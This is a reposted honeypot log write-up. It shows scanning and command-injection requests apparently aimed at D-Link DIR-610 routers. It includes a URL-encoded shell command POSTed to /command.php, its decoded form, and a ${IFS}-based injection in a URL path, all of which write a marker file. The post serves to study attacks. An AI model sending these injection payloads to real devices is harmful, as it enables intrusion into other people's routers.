IT大道IT大道

首页 >  技术 > DIR-610 exploit attack on a Honeypot

DIR-610 exploit attack on a Honeypot

原文 https://jsonsecurity.blogspot.com/2017/01/dir-610-exploit-at 2017-01-12 04:18:55 0 评论

On my honeypot I come across this sort of attach quite often, we need to keep in mind that my honeypot will reply always with "200 OK" whatever you send to it

2017-01-09 16:53:55 -- {'http': ['181.223.38.29', 'GET /cgi/common.cgi HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\n\r\n']}

2017-01-09 16:53:55 -- {'http': ['181.223.38.29', 'GET /stssys.htm HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\n\r\n']}

2017-01-09 16:53:56 -- {'http': ['181.223.38.29', 'GET / HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\n\r\n']}

2017-01-09 16:53:56 -- {'http': ['181.223.38.29', 'POST /command.php HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 208\r\n\r\ ncmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74 ']}

translated with urllib.unqoute() to

ncmd=cd /var/tmp && echo -ne \\x3610cker > 610cker.txt && cat 610cker.txt

2017-01-09 16:53:57 -- {'http': ['181.223.38.29', 'GET /language/Swedish${IFS}&&echo${IFS} 610cker >qt&&tar${IFS}/string.js HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\n\r\n']}

Tags:Linux

标签列表